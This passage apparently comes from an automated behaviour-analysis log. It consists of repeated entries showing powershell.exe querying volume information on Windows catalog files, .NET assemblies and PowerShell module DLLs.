                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
